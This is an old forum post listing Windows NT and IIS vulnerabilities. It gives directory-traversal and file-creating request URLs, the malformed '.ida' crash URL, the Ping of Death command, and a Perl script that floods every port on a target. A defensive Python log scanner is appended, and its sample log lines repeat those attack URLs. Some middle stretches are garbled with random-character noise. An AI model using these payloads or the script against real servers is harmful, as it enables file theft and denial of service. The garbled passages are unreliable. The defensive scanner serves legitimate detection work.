Title: NT vulnerabilities and descriptions (English)
Author: 雜七雜八    Date: 2011-1-13 17:12

Affected systems: 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'. If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------
Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:
Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):

# begin poke code
use Socket;
use FileHandle;
require "chat2.pl";           # Perl 4 era chat library; shipped with older Perl distributions
$systemname = shift @ARGV;    # host to test, given on the command line

$verbose = 1;     # tell me what you're hitting
$knownports = 1;  # don't hit known problem ports
for ($port = 1; $port < 65535; $port++)   # the posted text read '$port = $0', which is the script name, not a port
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;          # nothing listening on this port; skip it
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}
# end poke code

Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
7 x9 d0 I6 k& j0 F$ k-------------------------------------------------------------------------------- 5 T% @8 a; B' M9 G7 q: p6 R" C + K* f, W; |7 {) O D0 Y- {; ]受影響系統(tǒng):4.0' [7 ~: M4 H: p p+ p
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS. w. }4 _7 ~2 Y8 {: p' R, k- h - K D* e0 h; _, vThis attack causes Dr. Watson to display an alert window and to log an error: 8 B" ?0 A, N( @7 c6 {/ ^
! X4 B6 G$ o9 B+ k8 Z
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT" + z, ?" V7 `4 y. W0 @7 i% E$ F+ j8 a. w0 p
--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------
+ j1 h" p+ w& {9 x6 ~Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). ' j; ~! U3 s- Q0 C3 i& d 8 C$ [, K3 J3 F, ~8 j7 m& q-------------------------------------------------------- - [) ?3 t' d8 N1 _( o2 q4 h3 N) @; O
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
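The URL-based items in the post (the '..\..' traversal, the '>' redirection and '%0A%0D' trick in /scripts requests, the .ida/.idq path-disclosure probes and the 25 KB-of-dots '.ida' request) all leave a recognisable shape in a web server's request log. The following is an added example, not code from the post or from Microsoft: it classifies request URIs from a constructed log sample (W3C-like columns of client IP, method, URI, status are an assumption, as is the 4096-byte URL threshold), and shows a content-root containment check of the kind whose absence the traversal items describe. The sample log lines are constructed for this example and are not real traffic.

```python
"""Defender-side companion to the IIS/NT items above: a request classifier
run over constructed web-server log lines, plus a content-root containment
check of the kind the traversal items describe as missing."""
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log lines (client IP, method, URI, status); the URIs
# mirror the request shapes quoted in the post. Not real traffic.
SAMPLE_LOG = "\n".join([
    "10.0.0.5 GET /index.html 200",
    "10.0.0.7 GET /..\\.. 200",
    "10.0.0.7 GET /scripts..\\..\\scriptname 200",
    "10.0.0.9 GET /scripts/exploit.bat>PATH\\target.bat 200",
    "10.0.0.9 GET /scripts/script_name%0A%0D>PATH\\target.bat 200",
    "10.0.0.11 GET /anything.ida 404",
    "10.0.0.11 GET /anything.idq 404",
    "10.0.0.12 GET /" + "." * 25000 + "ida 500",
])

LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<uri>\S+) (?P<status>\d{3})$")
MAX_URL_LEN = 4096  # assumed threshold; tune to the longest legitimate URL you serve


def classify_request(uri):
    """Return the indicator names that match one request URI ([] if clean)."""
    findings = []
    path = urlsplit(uri).path
    decoded = unquote(path)
    # Treat '\' and '/' alike: NT accepts both, and '..\..' is the form quoted above.
    segments = re.split(r"[\\/]+", decoded)
    if ".." in segments:
        findings.append("path-traversal")
    if ">" in decoded:                        # shell redirection inside a /scripts request
        findings.append("shell-redirection")
    if "\r" in decoded or "\n" in decoded:    # %0A%0D appended to the script name
        findings.append("crlf-injection")
    if re.search(r"\.id[aq]$", decoded, re.IGNORECASE):
        findings.append("idq-ida-probe")
    if len(path) > MAX_URL_LEN:               # the 25 KB '.' padding before 'ida'
        findings.append("oversized-url")
    return findings


def scan_log(text):
    """Return [(client_ip, uri_prefix, findings)] for every flagged line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real collector would count these too
        findings = classify_request(m["uri"])
        if findings:
            hits.append((m["ip"], m["uri"][:40], findings))
    return hits


def resolve_under_root(content_root, uri):
    """Map a request path onto the content root and refuse anything that
    canonicalises outside it. Paths are normalised lexically with '/'
    separators so the check is portable and needs no filesystem access."""
    root = posixpath.normpath(content_root.replace("\\", "/"))
    decoded = unquote(urlsplit(uri).path).replace("\\", "/")
    full = posixpath.normpath(root + "/" + decoded.lstrip("/"))
    if full != root and not full.startswith(root + "/"):
        raise ValueError("request escapes content root: %r" % decoded)
    return full


if __name__ == "__main__":
    for ip, uri, findings in scan_log(SAMPLE_LOG):
        print(f"{ip:<10} {uri:<40} {', '.join(findings)}")
    for probe in ("/index.html", "/..\\.."):
        try:
            print(probe, "->", resolve_under_root("C:\\InetPub\\wwwroot", probe))
        except ValueError as exc:
            print(probe, "-> rejected:", exc)
```

The classifier decodes percent-encoding before looking for traversal segments and CR/LF bytes, since both '%0A%0D' and a literal '..' can be hidden by encoding; the containment check compares the normalised full path against the root prefix rather than merely stripping '..', so 'scripts..\..\scriptname' resolves to a file inside the root (as the OS would) while '..\..' is rejected outright.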